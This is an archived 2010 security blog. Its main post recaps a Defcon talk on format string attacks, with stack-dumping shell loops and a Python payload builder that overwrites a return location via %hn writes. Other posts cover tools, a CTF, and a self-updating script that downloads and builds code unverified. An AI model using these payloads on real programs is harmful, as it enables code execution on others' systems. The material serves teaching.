Redspin Labs
Defcon: Advanced Format String Attacks
by The Shell Shakespear on Aug.09, 2010, under Redspin Labs
Congratulations to those that survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks and especially the post Q&A and Mario Kart. My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from my talk, sans voice:
Demo 1: Attacking a program (Makefile) vulnerable to a format string attack, we dump the stack of the program one positional argument at a time until we find our own format string, using the following code:
for i in {001..200}; do echo -n "offset $i (%$i\$08x) = "; ./printf "%$i\$08x" | python -c "import sys, struct; s=int(sys.stdin.read(),16); print '0x%08x: %s' % (s,repr(struct.pack('L',s)))"; done
Demo 2: Finding the address of our format string. This combined with the stack offset found in the previous step lets us associate any data on the stack with its address using the following code:
for i in {1..100}; do ./printf "offset $i = %$i\$p:%$i\$s"; echo; done | grep -v ^$
Demo 3: Video of our technique demonstrated in our previous POC tool automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and overwriting a known return location.
Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and brute forcing addresses on the stack for a valid return location. This includes both a Python and a Ruby implementation.
Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack, exploited automatically by locating the stack offset and address of our exploit and brute forcing addresses on the stack for a valid return location. The Metasploit module and vulnerable server are available for download.
All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2
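To make the chain behind Demos 1 to 4 concrete, here is an added worked example; it is not code from the talk or from the Redspin POC tool. It assumes a 32-bit little-endian target, positional argument syntax (%N$) and the glibc behaviour of mixing positional and sequential conversions; every address, the stack dump and the "AAAA" marker are constructed for the example. locate_offset() is Demo 1 in code (find the positional argument that aliases our string), stack_word_address() is Demo 2 (turn that offset plus one leaked pointer into an address for any stack word), build_write() is the next step the talk automates, writing a chosen value to a known return location with two %hn stores, and simulate_printf() is a toy model of the printf counting and %n behaviour so the payload can be checked offline. The simulator also understands %hhn single-byte stores, which the example itself does not need.

```python
import re
import struct

MARKER = 0x41414141  # the "AAAA" placed at the very start of our own format string


def locate_offset(dump, marker=MARKER):
    """Demo 1: `dump` holds the 32-bit words printed by %N$08x for N = 1, 2, ...
    Return the 1-based N whose word is our marker, i.e. the positional argument
    that aliases the first four bytes of our string, or None if not found."""
    for n, word in enumerate(dump, start=1):
        if word == marker:
            return n
    return None


def stack_word_address(fmt_addr, fmt_offset, n, word_size=4):
    """Demo 2: %N$p at some offset revealed the address of our string (fmt_addr)
    and Demo 1 gave the offset of the string itself (fmt_offset); from those two
    numbers the address of any stack word N follows."""
    return fmt_addr + (n - fmt_offset) * word_size


def build_write(target, value, offset, prefix_len=0):
    """Build a format string that stores the 32-bit `value` at `target` with two
    %hn half-word writes. `offset` is the positional argument holding the first
    four bytes of our string, `prefix_len` the number of characters the program
    prints before our data (e.g. len("offset 7 = "))."""
    addrs = struct.pack('<II', target, target + 2)        # low half, then high half
    if b'\x00' in addrs or b'%' in addrs:
        raise ValueError('address contains a NUL or % byte; printf would stop or misparse')
    written = prefix_len + len(addrs)                     # characters emitted so far
    halves = [(value & 0xffff, offset), ((value >> 16) & 0xffff, offset + 1)]
    fmt = ''
    for half, pos in sorted(halves):                      # smaller half first: padding stays >= 0
        pad = (half - written) % 0x10000
        if pad:
            fmt += '%%%dc' % pad                          # %<pad>c emits exactly pad characters
        fmt += '%%%d$hn' % pos                            # store the low 16 bits of the count
        written += pad
    return addrs + fmt.encode()


SPEC = re.compile(rb'%(?:(\d+)\$)?(\d*)(hh|h)?([cxn])')   # the subset of printf we model


def simulate_printf(fmt, stack, memory):
    """Toy model of the printf behaviour the attack relies on: count the
    characters emitted, resolve positional (%N$) and sequential arguments
    against `stack` (a list of 32-bit words), and perform %n/%hn/%hhn stores
    into `memory` (dict: byte address -> byte value). Returns the count."""
    written, next_arg, i = 0, 1, 0
    while i < len(fmt):
        if fmt[i] == 0:                   # NUL terminates the C string
            break
        if fmt[i] != 0x25:                # ordinary byte, printed as is
            written += 1
            i += 1
            continue
        m = SPEC.match(fmt, i)
        if not m:
            raise ValueError('unsupported conversion at byte %d' % i)
        argpos, width, length, conv = m.groups()
        if argpos:
            arg = stack[int(argpos) - 1]
        else:
            arg = stack[next_arg - 1]
            next_arg += 1
        width = int(width) if width else 0
        if conv == b'c':
            written += max(width, 1)
        elif conv == b'x':
            written += max(width, len('%x' % arg))
        else:                             # %n family: store the count, sized by the modifier
            nbytes = {b'hh': 1, b'h': 2, None: 4}[length]
            for k in range(nbytes):
                memory[arg + k] = (written >> (8 * k)) & 0xff   # little-endian store
        i = m.end()
    return written


def read_u32(memory, addr):
    """Assemble the little-endian 32-bit word stored at addr."""
    return sum(memory.get(addr + k, 0) << (8 * k) for k in range(4))


def demo():
    """Whole chain on a constructed stack: locate, build, 'print', verify."""
    target = 0x08049f10     # hypothetical saved return slot / GOT entry
    value = 0x0804a0b4      # hypothetical address we want execution to reach
    # Constructed Demo 1 output: our marker surfaces as positional argument 7.
    dump = [0xbffff4a0, 0x000000a0, 0x0804847b, 0xbffff4c8, 0x1, 0xbffff4f4, MARKER]
    offset = locate_offset(dump)
    payload = build_write(target, value, offset)
    # With the payload in place, arguments 7 and 8 alias its two address words.
    stack = dump[:offset - 1] + list(struct.unpack('<II', payload[:8]))
    memory = {}
    simulate_printf(payload, stack, memory)
    return offset, payload, read_u32(memory, target)


if __name__ == '__main__':
    off, payload, stored = demo()
    print('offset=%d payload=%r stored=0x%08x' % (off, payload, stored))
```

Two details matter on a real target and are built into build_write(): the two address words are written first, so any NUL or '%' byte in them ends or corrupts the string, and the half-word with the smaller value is stored first so the %c padding is never negative. The padding uses %<width>c rather than %<width>x because %c emits exactly width characters, which keeps the running count predictable.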
A bad Apple…
by jhaddix on Jun.09, 2010, under Redspin Labs
This week iPad owners had their email addresses leaked via a security vulnerability in the way iPads registered with AT&T’s 3G service. Approximately 114,000 email addresses were brute forced out of a script that was supposed to recognize an iPad owner's ICC-ID (a “unique” identifier which turned out to be predictable) and return an AJAX response containing the email address associated with that ICC-ID.
The grey-hat security group that found the vulnerability brute-forced ICC-IDs and analyzed the resulting successful request/response pairs using a PHP script that faked the iPad user agent. This exploit was apparently released in the hacker scene before AT&T removed the functionality.
Although email addresses are usually harmless, a large number of high-ranking military and government officials registered their .mil and .gov addresses with their iPads, not to mention celebrity email addresses, which are usually hush-hush pieces of information. Knowing these addresses opens them up to a large number of spammers and would-be social engineers who will now be checking every login field on the internet for accounts belonging to them (and we all know celebs use strong passwords, yes?).
Many will have to be changed or removed entirely, some mail systems will need to be re-examined for hardness, spam rules will need to be tweaked, etc. A lot of IT elbow grease will go into preventing damage from Apple’s and AT&T’s debacle. Early adopters of technology should always consider that they are basically in the beta-test phase as far as security is concerned.
Remember, an iPad a day doesn’t keep the hackers away!
**UPDATE**
Praetorian Security released a blog that has the actual script used here.
Defcon CTF Qualifiers
by jhaddix on May.25, 2010, under Redspin Labs
Every year the hacking community, both black and whitehat, come together in Las Vegas for the annual Blackhat and Defcon conferences. We discuss new attacks, show interesting research, release tools, and let loose a bit. Defcon in particular centers around a number of great competitions, the most prestigious of them being the Defcon Capture The Flag.
Hacker teams from all over the world participate in the CTF qualifiers. This year 535 teams registered, 265 of which scored points. The top 10 play in the CTF event in Las Vegas at the conference. Think of it as a hacker superbowl.
This year we threw a team together, six guys (feakk, myself (@jhaddix), @OwNpile, @ap3r, @fulg0re, @timmedin), who had a few hours on the weekend to check out the game. Only a few of us had played before, but one of our team members won with Shellphish a few years back.
Below is the scoreboard format and links to the solutions that have been posted on the web (in English so far). It’s a jeopardy style point game, the higher the points, the harder the question. We placed 66th as team dirty_apes =) We had a great time and hopefully will get to spend the full 3 days to hack next year.
| Pursuits Trivial | Crypto Badness | Packet Madness | Binary L33tness | Pwtent Pwnables | Forensics |
| 100 | 100 | 100 | 100 | 100 | 100 |
| 200 | 200 | 200 | 200 | 200 | 200 |
| 300 | 300 | 300 | 300 | 300 | 300 |
| 400 | 400 | 400 | 400 | 400 | 400 |
| 500 | 500 | 500 | 500 | 500 | 500 |
Final Scores – http://www.ddtek.biz/qualsDC18scores.txt
Binaries to Download – http://work.hackerschool.org/DOWNLOAD/DefconCTF/2010/
Finding Social Security Numbers in packet captures with grep and ngrep
by Nathan Drier on Apr.16, 2010, under Redspin Labs
Converting Lots of PDFs to TXTs in Ubuntu/Debian
by David Bailey on Apr.15, 2010, under Redspin Labs
For those of you who are struggling to find a way to convert PDF files into TXT files, here is a quick bash script. There are many alternatives out there, but none were reliable for me. You’ll need to have acroread and ghostscript installed for this to work. Every filename is quoted, so PDFs with spaces in their names are handled.
#!/bin/bash
# Convert every PDF in the current directory to text by way of PostScript.
# Requires acroread (for -toPostScript) and ghostscript (for ps2txt).
mkdir -p ps txt
for f in *.pdf
do
    [ -e "$f" ] || { echo "No PDF files found in $(pwd)"; exit 1; }
    echo "Processing $f"
    acroread -toPostScript "$f" ps/
    g=$(basename "$f" .pdf)
    ps2txt "ps/$g.ps" > "txt/$g.txt"
done
You can also change the ps2txt line to read
ps2txt "ps/$g.ps" | grep -v "EXCLUDE" > "txt/$g.txt"
where EXCLUDE is a line that you want to exclude from each PDF, such as a repeated header or footer. Please let me know if you have any problems.
enjoy,
db
Keeping Current with Skipfish
by The Shell Shakespear on Apr.07, 2010, under Redspin Labs
You have followed our posts on how to install skipfish on your Ubuntu/Debian based machine, and read our testing with Mutillidae. With the rapid pace of skipfish releases, however, your local copy may start to smell. Now you can automate the delivery of fresh fish to your doorstep. Copy the code below to update_skippy.sh in your skipfish directory, run chmod +x update_skippy.sh and then ./update_skippy.sh to ensure your security tool-bowl is kept well stocked. One caveat: the script trusts whatever it downloads. It extracts the tarball over the current directory and runs make without checking a checksum or signature, so run it as an unprivileged user from a directory that contains nothing but skipfish.
#!/bin/bash
# Checks local version of skipfish and update if newer version exists
# Copyright (C) 2010 Paul Haas <phaas AT redspin DOT com>
# Licensed under the GNU Public License version 3.0 or greater
SKIP='https://code.google.com/p/skipfish/downloads/list'
TGZ='"[^"]*.tgz"'
LOCAL=$(head -n1 ChangeLog | grep -o '[0-9.]*')
REMOTE=$(wget -q "$SKIP" -O- | grep -e "version" | cut -d' ' -f4)
#REMOTE=$(curl -s "$SKIP" | grep -e "version" | cut -d' ' -f4) # Curl optional
[ -n "$LOCAL" ] && [ -n "$REMOTE" ] || { echo "Could not determine local ($LOCAL) or remote ($REMOTE) version."; exit 1; }
LM=${LOCAL%.[0-9]*}
Lm=${LOCAL#[0-9]*.}
RM=${REMOTE%.[0-9]*}
Rm=${REMOTE#[0-9]*.}
# 10# forces base 10: [[ -lt ]] evaluates arithmetic, so a minor version such as "08" would otherwise be rejected as an invalid octal number
if [[ "10#$LM" -lt "10#$RM" || "10#$LM" -eq "10#$RM" && "10#$Lm" -lt "10#$Rm" ]]
then
echo "Updating Skipfish from $LOCAL to $REMOTE."
wget -q "$SKIP" -O- | grep -o "$TGZ" | tr -d \" | wget -q -i- -O- | tar zxf - --strip=1
#curl -s "$SKIP" | grep -o "$TGZ" | tr -d \" | xargs curl -s | tar zxf - --strip=1
make clean
make
else
echo "Skipfish $LOCAL ($REMOTE) is up to date."
fi
Netsparker Community Edition – “The Sparkler”
by jhaddix on Apr.07, 2010, under Redspin Labs
Believe me when I say that we’ve used a lot of tools. We love scripts, we love things that free up our time to do the real analysis on a web application assessment. We have used w3af, Nikto, Grendel-Scan, etc., etc. We are really happy to see a community edition of a tool we have used in its pro incarnation: Netsparker.
Netsparker announced today that it is releasing a community edition lacking only a few features of the pro version. We highly appreciate this, especially its “free as in beer” release. Yes, it’s Windows only, but we can forgive that for a moment.
Why is Netsparker valuable?
- It beats Appscan and Webinspect in injection tests most of the time
- Its spider is fast and furious
- Its configuration vulnerability database is up to date
- Its remediation advice is sound and technical
- It very rarely has false positives, and initial testing also shows low false negative results
CE doesn’t include some exploitation features and certain categories of checks (command injection, RFI, etc.). Despite that it’s still a great tool to add to your utility belt; we recommend adding it to your web application security regimen =)
Check out the https://www.mavitunasecurity.com/pricing/ page to see the difference between pro and CE.
Burp Suite Professional to XML: BURP2XML
by The Shell Shakespear on Mar.24, 2010, under Redspin Labs
With the incorporation of Burp Suite Professional into our audit processes, we discovered that there was not an easy method to extract results from Burp’s session file without having to manually re-run Burp. In order to automate this process, we have developed a standalone Python script to process Burp’s session files into XML, and have released it under the GPLv3 License here burp2xml.py:
#!/usr/bin/env python
#Developed by Paul Haas, <phaas AT redspin DOT com> under Redspin. Inc.
#Licensed under the GNU Public License version 3.0 (2008-2009)
#Written for Python 2: relies on print statements and str-typed binary data
'''Process Burp Suite Professional's output into a well-formed XML document.
Burp Suite Pro's session file is zipped into a combination of XML-like tags
containing leading binary headers with type and length definitions followed by
the actual data. The theory is that this allows the file to be read sequentially
rather than requiring tedious XML parsing. However, without re-writing Burp's
internal parser, we have no way to extract results from its files without
loading the results in Burp.
This tool takes a zipped Burp file and outputs a XML document based upon the
provided arguments which allows regular XPATH queries and XSL transformations.
'''
import datetime, string, re, struct, zipfile, sys

TAG = re.compile('</?(\w*)>',re.M) # Match a XML tag
nvprint = string.printable.replace('\x0b','').replace('\x0c','') # Printables

def milliseconds_to_date(milliseconds):
    '''Convert milliseconds since Epoch (from Java) to Python date structure:
    See: http://java.sun.com/j2se/1.4.2/docs/api/java/util/Date.html
    There is no direct way to convert milliseconds since Epoch to Python object
    So we convert the milliseconds to seconds first as a POSIX timestamp which
    can be used to get a valid date, and then use the parsed values from that
    object along with converting milli -> micro seconds in a new date object.'''
    try:
        d = datetime.datetime.fromtimestamp(milliseconds//1000)
        date = datetime.datetime(d.year,d.month,d.day,d.hour,d.minute,d.second,
                                 (milliseconds%1000)*1000)
    except ValueError, e: # Bad date, just return the milliseconds
        date = str(milliseconds)
    return date

def burp_binary_field(field,i):
    '''Strip Burp Suite's binary format characters types from our data.
    The first character after the leading tag describes the type of the data.'''
    if len(field) <= i:
        return None,-1
    elif field[i] == '\x00': # 4 byte integer value
        return str(struct.unpack('>I',field[i+1:i+5])[0]),5
    elif field[i] == '\x01': # Two possible unsigned long long types
        if field[i+1] == '\x00': # (64bit) 8 Byte Java Date
            ms = struct.unpack('>Q',field[i+1:i+9])[0]
            date = milliseconds_to_date(ms)
            # ctime string for a valid date, the raw millisecond string otherwise
            value = date.ctime() if isinstance(date, datetime.datetime) else date
        else: # Serial Number only used occasionally in Burp
            value = str(struct.unpack('>Q',field[i+1:i+9])[0])
        return value,9
    elif field[i] == '\x02': # Boolean Object True/False
        return str(struct.unpack('?',field[i+1:i+2])[0]),2
    elif field[i] == '\x03' or field[i] == '\x04': # 4 byte length + string
        length = struct.unpack('>I',field[i+1:i+5])[0]
        #print "Saw string of length",length,"at",i+5,i+5+length
        value = field[i+5:i+5+length]
        if '<' in value or '>' in value or '&' in value: # Sanitize HTML w/CDATA
            # A literal ']]>' in the data would close the section early; splitting
            # it as ']]]]><![CDATA[>' keeps the text intact and the XML well-formed
            value = '<![CDATA[' + value.replace(']]>',']]]]><![CDATA[>') + ']]>'
        value = ''.join(c for c in value if c in nvprint) # Remove nonprintables
        return value,5+length # ** TODO: Verify length by matching end tag **
    print "Unknown binary format",repr(field[i])
    return None,-1

def burp_to_xml(filename):
    '''Unzip Burp's file, remove non-printable characters, CDATA any HTML,
    include a valid XML header and trailer, and return a valid XML string.'''
    xml = '' # Our output string
    z = zipfile.ZipFile(filename) # Open Burp's zip file
    burp = z.read('burp') # Read-in the main burp file (second argument would be a password)
    m = TAG.match(burp,0) # Match a tag at the start of the string
    while m:
        xml += m.group()
        index = m.end()
        etag = m.group().replace('<','</') # Matching tag
        m = TAG.match(burp,index) # Attempt to get the next tag
        if not m: # Data follows
            # Read the type of data using Burp's binary data headers
            value, length = burp_binary_field(burp, index)
            if value is None: break
            xml += value
            xml += etag
            index += length + len(etag) # Point our index to the next tag
            m = TAG.match(burp,index) # And retrieve it
    xml = '<?xml version="1.0"?><burp>' + xml + '</burp>' # XMLify our string
    return xml # And return it

def main():
    '''Called if script is run from the command line.'''
    if (len(sys.argv) < 2):
        print __doc__
        print "Usage:",sys.argv[0],"burp_session_file {output XML name}"
        sys.exit(1)
    xml = burp_to_xml(sys.argv[1])
    # Write out file to an optional argument or provided file + xml extension
    out = sys.argv[2] if (len(sys.argv) > 2) else sys.argv[1]+'.xml'
    f = open(out, 'wb')
    f.write(xml)
    f.close()
    #sys.stdout.write("# Output written to %s\n" % out)

if __name__ == '__main__':
    main()
My next post will include some useful commands for parsing XML on the command line. Let us know if you have any questions running it or include it in your projects.
Skipfish, Google Enters the Web Scanner Fray
by jhaddix on Mar.19, 2010, under Redspin Labs
This morning the office was buzzing with Google hysteria. Google, releasing great security tools like RATproxy, has released a web application scanner similar to Nikto (and to a lesser extent Nessus web Checks) called Skipfish.
Now, we understand that not everyone is a Goog-Fanboy, but we love testing new apps.
We wrote a cursory install for a testbed machine here. Notice Skipfish has very low overhead in the dependencies area, which is great.
At first we tested Skipfish against a live domain we control. Below you can see the live statistics output. At first glance you notice that Google’s Skipfish is blazing fast. We got 600+ req/sec on a 10Mb connection, which is credit to it’s “pure C implementation, including a custom HTTP stack.” The live statistics are very verbose, breaking up both the “Scan Statistics” and “Database Statistics” :
We then decided to test against a very widespread testing environment, Mutillidae a set of vulnerable PHP’s scripts by Iron Geek. For kicks we also tested the same implementation with Nikto.
Before scanning we did a cursory review of the C source for detecting errors, which is pretty comprehensive and supports a large set of platforms. It’s Dictionary Bruting resource-list, by default, will auto-learn probable keywords and add any found resources to the wordlists file. Very cool.
In the twitter-verse many infosec friends were quick to find faults in the code of the app itself, which is valid, but for a web app scanner we will live with some inherent vulnerabilities if Skipfish proves to be a valuable tool.
After about half a day of using Skipfish, we have some mixed feelings. Although Google’s docs say that the input injection logic saves on requests, it still managed to crash our janky Mutillidae install. It also segfaulted and tanked our testing box when it somehow hit a loop trying to parse out multiple identical findings. BTW it is HEAVY on requests… like 1-2 million heavy.
Granted, on a successful completion, the output is pretty win. We like the “clickability” factor, and its conciseness on web 2.0 vulnerabilities.
The full doc explaining the injection tests of Skipfish can be found here towards the bottom of the page.
The Skinny:
We like it. As Google says, it’s not an end-all-be-all for web application scanners, but it definitely has some great logic and features, and is blazing fast. Also, if you have followed the dev track, the developer Michal Zalewski has been quick to update for problems (1.01b fixes some crashing problems) and has some great upcoming features planned (pause/resume, VIEWSTATE testing, etc.). Although no scanner will ever replace a smart web app assessment engineer, Skipfish shows great potential in the security space and… it’s free. It won’t replace any of our manual processes but we will definitely use it when applicable. Thanks Google.
** Updated:
After a full day of watching this puppy go, we’d like to add that Skipfish’s scanning generates large numbers of HTTP requests. We have heard reports of up to 10 million, and some people testing against their providers are being firewalled quickly. We recommend switching to the minimal .wl file and limiting your requests to, say… 800k.
Installing Google Skipfish on Ubuntu/Debian
by David Bailey on Mar.19, 2010, under Redspin Labs
check out jason’s post for an in-depth review. http://bit.ly/9LAnbt
here’s the simple commands necessary to get hacking with Google’s new web application scanner Skipfish:
wget http://skipfish.googlecode.com/files/skipfish-1.01b.tgz
tar zxvf skipfish-1.01b.tgz
sudo apt-get install libidn11-dev
cd skipfish
make
cp dictionaries/default.wl skipfish.wl
./skipfish -o output_folder http://www.example.com
you’ll want to less README to understand all the options.
more to come shortly with our opinions, tips and lab results. currently we’re getting 600+ requests/second for internet sites, 4000+ requests/second for local tests.
enjoy,